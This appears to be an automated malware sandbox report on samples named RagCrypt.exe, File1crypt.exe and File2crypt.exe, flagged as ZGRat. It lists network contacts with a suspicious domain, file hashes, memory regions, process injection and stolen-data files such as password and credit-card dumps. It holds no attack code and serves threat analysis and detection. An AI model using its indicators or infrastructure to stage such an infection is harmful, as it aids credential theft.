US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 172.67.162.192:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 192.162.67.172.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 152.199.19.74:80 tcp
GB 104.77.160.14:80 tcp
GB 23.37.0.169:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.142.223.178:80 tcp
US 8.8.8.8:53 udp
N/A 52.167.17.97:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.167.17.97:443 tcp
US 8.8.8.8:53 udp
N/A 52.165.165.26:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.3.187.198:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 40.127.169.103:443 tcp
US 8.8.8.8:53 udp
N/A 40.127.169.103:443 tcp
US 8.8.8.8:53 udp
N/A 104.77.160.28:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 udp
N/A 208.95.112.1:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 149.154.167.220:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 162.159.129.233:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
GB 96.17.179.41:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
N/A 151.80.29.83:443 tcp
US 8.8.8.8:53 udp
N/A 136.175.8.205:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.18.114.97:80 tcp
N/A 162.159.129.233:443 tcp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 udp
N/A 52.111.229.19:443 tcp
US 8.8.8.8:53 udp

Files

memory/4468-0-0x0000000004C00000-0x0000000004C36000-memory.dmp

memory/4468-3-0x0000000004D70000-0x0000000004D80000-memory.dmp

memory/4468-2-0x0000000004D70000-0x0000000004D80000-memory.dmp

memory/4468-1-0x0000000072170000-0x0000000072920000-memory.dmp

memory/4468-4-0x00000000053B0000-0x00000000059D8000-memory.dmp

memory/4468-6-0x0000000005B10000-0x0000000005B76000-memory.dmp

memory/4468-5-0x0000000005310000-0x0000000005332000-memory.dmp

memory/4468-12-0x0000000005B80000-0x0000000005BE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uklsy1xw.nft.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4468-17-0x0000000005CF0000-0x0000000006044000-memory.dmp

memory/4468-18-0x00000000061A0000-0x00000000061BE000-memory.dmp

memory/4468-19-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/4468-22-0x0000000006740000-0x0000000006762000-memory.dmp

memory/4468-23-0x0000000007A40000-0x0000000007FE4000-memory.dmp

memory/4468-21-0x00000000066D0000-0x00000000066EA000-memory.dmp

memory/4468-20-0x00000000073F0000-0x0000000007486000-memory.dmp

memory/4468-24-0x0000000008670000-0x0000000008CEA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Document.pdf

MD5 80a2593453c09724d152e841a3ff0865
SHA1 c73c293d18aac71c530d69ea03314f064f5c6386
SHA256 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd
SHA512 ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 d28d630260b12cffcaf5afbd3fcd488d
SHA1 b5b2ffda8805165e393ed23fda6ee02b0de207a0
SHA256 5515c692e4b0b0d99d139baf53394d4eb2e16b05a7a1c906e1406c207e21c5a0
SHA512 81528282cee78b8fdbc795549131bfd2de9c6517664e12228a531999603d14c714faf644587e9618a147e96bf65950388d348c528875d56292d1b924c59cdba8

memory/2236-39-0x0000000000070000-0x00000000001B6000-memory.dmp

memory/2236-41-0x0000000004BC0000-0x0000000004BD0000-memory.dmp

memory/2236-43-0x0000000004CD0000-0x0000000004E06000-memory.dmp

memory/2236-47-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-51-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-57-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-63-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-69-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-75-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-81-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-83-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-79-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-85-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-89-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-91-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-93-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-95-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-87-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-97-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-77-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-99-0x0000000004CD0000-0x0000000004E01000-memory.dmp

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 774c1a62c46b127185ce69e68b3eb323
SHA1 e3bdad0863ad95c1b21a86c4d510c85cae7020ec
SHA256 39818ea97715df3133afda16f56775e0f9928424e99f98e99557bd9b4cb12b54
SHA512 347a598bb94f87334d776b48bbf647a2390d213c450b8afa866497cb7f5ca8cc57fbd28a7d2b3d279fcf81958948c0a354b7cab5b568f8d3b6fbfe894f4bec74

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 5f7664097ffe92ac09565fb443b70849
SHA1 b8f873c802be357a94d5162ee09f5c3e8ebc46e3
SHA256 4467b911160749f59ae0b2308b7270594fc241948aaeda13ff92e7066211f9a3
SHA512 52890416edbe90eab2b42dee114680edbab90051234edcde9a00db4b928056b3da1be04af4618a48afad193b76ec28a27c4ee0d7dd8fc3057a2429af0d84e2b9

memory/3396-129-0x0000000072170000-0x0000000072920000-memory.dmp

memory/3396-131-0x0000000004BC0000-0x0000000004BD0000-memory.dmp

memory/3396-137-0x0000000004BD0000-0x0000000004DD8000-memory.dmp

memory/3396-140-0x0000000005F80000-0x000000000618A000-memory.dmp

memory/4468-132-0x0000000072170000-0x0000000072920000-memory.dmp

memory/3396-128-0x0000000000040000-0x0000000000258000-memory.dmp

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 cf17d3928737eab522ebb617737a6dff
SHA1 5c42ab8b20034607124f97cedb75e34dd80c9172
SHA256 e9765d102669d5457e38082b367469c3669889d459f5efd0f8a6c260356d2ae5
SHA512 af4903ecaa217cf3843b793b11ac387a205a3088defef08e4635929ed1de9bdb2c36fba11df17c84ca2b2a691edf2f9d4e51224242538e0bba18c992da0775ab

memory/2236-115-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-113-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-105-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-101-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-73-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-71-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-67-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-65-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-61-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-59-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-55-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-53-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-49-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-45-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-44-0x0000000004CD0000-0x0000000004E01000-memory.dmp

memory/2236-42-0x0000000004A80000-0x0000000004BB6000-memory.dmp

memory/2236-40-0x0000000072170000-0x0000000072920000-memory.dmp

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 d53f91c99e731fae151b03b600b1b05b
SHA1 3d06e3a29acdf75eef3698c0cf72e16990def99c
SHA256 3e16b688dd6eded9503ebf4a804adaae02e4628cc1cc52c749e17c3ed58123be
SHA512 5f60964eb2d4df0d0ff7544fb78568e01a7b0f9cd133e509ed17243f858b0acac415d85d03212746af207d4169d7b01a715a5ada92bfe52d417ac25cd55fd8d7

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 29c11e7b0c44cbbfec546b0469dcc8a2
SHA1 1227f46ba3b08ebad1a6f3536d4e523f5830a12c
SHA256 572de60da00d0f6ef8657e766d84a5284f3a90d6b6d4cd8795ef1d5af95c0ee6
SHA512 143bf88b9d6d07bb0fb0b059d2b6ea2c529e9a401c55653e94fd79285a4e506e42cdd0bc0d5ae7877a0062d3de76dedf1f94c7cfaded7db0f57aa53b581cae06

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 d0df5f9974138501424cb06472477adf
SHA1 9d143e2c9c48327c6fa0b4f2fb65be982037db51
SHA256 6c3615c908cb98afc062e70b7f985bf7b667fd8540a25824aa07a14b6b6a05d6
SHA512 9a7d8b47a8311e00ba206fee9bf0d42991a0caaf43492ea067bb6c9eb333a3231a35bae1efcd95add82d6dbfcfef5e10d42c084b9e73c5fdd7eadf8131324617

C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

MD5 21c7373cbebe36d40311199e37a311ff
SHA1 4966bb36fa9545fa8481d1314471a374f3d053c3
SHA256 9219e342d27bc5f3824eb6198773d7953e840b9e62220de75c4652fdfac3815a
SHA512 a09399ab463e5616d61345a0c3538e3ea34d185e12f525ffb7b7f3d364771f7d142969a4e10221c5cb6129b934f48eeae122e0bd50a57ac7f1d0eadb9bdece20

memory/2236-2007-0x0000000005190000-0x000000000525E000-memory.dmp

memory/2236-2008-0x0000000005000000-0x000000000504C000-memory.dmp

memory/2236-2002-0x0000000002510000-0x0000000002511000-memory.dmp

C:\Users\Admin\AppData\Roaming\File1crypt.exe

MD5 273a0cfac73dc5c9525fe0b5d3b21dee
SHA1 e29164a17369cbc87a21fac0720249c288ab3097
SHA256 3708f0d7d78b4e11fd45fcadc6dc83105870bb8ec92eea2faa00e08989fca735
SHA512 337937ae23f2c7282e9a388791cb73857b22e766153e7dbd90b1fe69c66881f745218fe534baecca6a54e1a06d653753de52618ed965bbd24ff4c48ce8d8ed0f

memory/2348-2028-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2348-2031-0x00000000053C0000-0x0000000005452000-memory.dmp

memory/2348-2037-0x0000000002C50000-0x0000000002C60000-memory.dmp

memory/2348-2026-0x0000000000400000-0x0000000000578000-memory.dmp

memory/2236-2025-0x0000000072170000-0x0000000072920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/2348-2069-0x0000000006330000-0x000000000633A000-memory.dmp

memory/3396-2079-0x0000000004490000-0x0000000004491000-memory.dmp

memory/3396-2080-0x0000000006480000-0x0000000006622000-memory.dmp

memory/3396-2078-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2112-2086-0x0000000000400000-0x0000000000592000-memory.dmp

memory/2112-2087-0x0000000072170000-0x0000000072920000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt

MD5 36f6acc2229073f5bb4074cee73d1d5b
SHA1 b2adbb44350d984dff40c15fcbbeb3379c7ec0e5
SHA256 8a947e0921f9cfada15c19a72f0ff31b38ad4602106c6ee95685d61c223c9a35
SHA512 da8b627bd674ceb0da7e30ba543ab82ab694d3f6e0474b48ca343ee74e20147440d2205b6ce66f5caa2a39061dedd2ca4146e263fac9f146a228c5b5cba4aaad

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt

MD5 6be6fdca0cfa94635b8689b2b0bf2bee
SHA1 379c61029b5443c3d3df7c770423e40618b36d15
SHA256 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA512 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8

memory/3396-2088-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2348-2084-0x0000000008B80000-0x0000000008BD0000-memory.dmp

C:\Users\Admin\AppData\Roaming\File2crypt.exe

MD5 194abb15d1b07f052be0b18ffa238050
SHA1 8ec9ff9eeb88645f6e6b538c3163cc4894f82ec2
SHA256 e8f4ee6351764bc703f118df85c629084f85bd325bcc1930f0982461938a4ecb
SHA512 52c5a71a023f290962a445bc5c6befd0ce8f7310b6c9185022c6b520a07a61f846b684fa1d7533ada37deeb868a59cd0997d9cd1459f32957b527701ca296805

memory/2112-2121-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2348-2129-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2112-2140-0x0000000005CF0000-0x0000000005CF8000-memory.dmp

memory/2112-2139-0x00000000057B0000-0x00000000057D6000-memory.dmp

memory/2112-2138-0x0000000005C60000-0x0000000005CF2000-memory.dmp

memory/2112-2142-0x0000000006C20000-0x0000000006C28000-memory.dmp

memory/2112-2143-0x0000000006C40000-0x0000000006C5E000-memory.dmp

memory/2112-2141-0x0000000006C10000-0x0000000006C1A000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Process.txt

MD5 e1261b30bcee5ffdb8725793d8247b4e
SHA1 22d3a1dd3d1e2e6351301a87b1d5fc79057ab0df
SHA256 185a74f3aa4672f9b94625d03f8828bbe2d31ad05c825008abdf0e2837921cf7
SHA512 acb1f33e644f1174079e5708bfbeaf4a227f576a07af56a822261edd88bd65965d52ca17bcc92406662ba4807550abc12692614b4adca9affcf697d2a225e0b5

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

memory/2112-2332-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2334-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2337-0x0000000006E90000-0x0000000006F0A000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\Debug.txt

MD5 9f7e8c90c8e4f0e6976a3d69a59e13e6
SHA1 a678403153d4e71bcae97c83c65707d9bcb86bb6
SHA256 9a0344723389aee9269af868fdcd5ae0d22d04eb5e88b656fd146dd143e9a0ce
SHA512 c13cd581b6062c538f2be58e88ec00d518f76e5f0f3870458a51489a4e833f8e7ba8408e58e94038c8dab21c63821d52d181faee1ddbf6128f29bbc545b533ed

memory/2112-2410-0x0000000007140000-0x00000000071F2000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\Admin@AAKWQUEG_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

memory/2112-2412-0x0000000008300000-0x0000000008654000-memory.dmp

C:\Users\Admin\AppData\Local\006797a6b513cedcf6fa9d8a105df8f1\msgid.dat

MD5 af6f1933326883369932eff6d98e0098
SHA1 888e43aff1981840211a034ba78e048a48ab3b8a
SHA256 8052615aa0bdf7a250e889aacee4d06c82cd18f01add69f89332d5db3fc1ca21
SHA512 46b87b38eac0122ee226e348288a2acf272fb3d2e68503e20a1572a464e0a0b4b70b0f4225d5188b7c6dd1ba12d237a318fe3b43e9b4abae334b54f5a4a255f7

memory/2112-2430-0x0000000072170000-0x0000000072920000-memory.dmp

memory/2112-2437-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2438-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/2112-2439-0x00000000057E0000-0x00000000057F0000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

5s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 352 set thread context of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 352 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe
PID 352 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RagCrypt.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
GB 96.17.179.70:80 tcp
GB 104.77.160.28:80 tcp
GB 96.17.179.83:80 tcp
US 8.8.8.8:53 68.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 70.179.17.96.in-addr.arpa udp
GB 104.77.160.28:80 tcp
GB 104.77.160.28:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
N/A 96.16.110.41:443 tcp
N/A 20.223.35.26:443 tcp
N/A 20.223.35.26:443 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
SE 192.229.221.95:80 tcp
SE 192.229.221.95:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp
GB 96.17.179.55:80 tcp

Files

memory/352-1-0x00000000751F0000-0x00000000759A0000-memory.dmp

memory/352-0-0x00000000001A0000-0x00000000001BC000-memory.dmp

memory/352-2-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

memory/352-3-0x0000000005660000-0x0000000005796000-memory.dmp

memory/352-11-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-19-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-25-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-33-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-39-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-49-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-57-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-65-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-67-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-63-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-61-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-59-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-55-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-53-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-51-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-47-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-45-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-43-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-41-0x0000000005660000-0x0000000005790000-memory.dmp

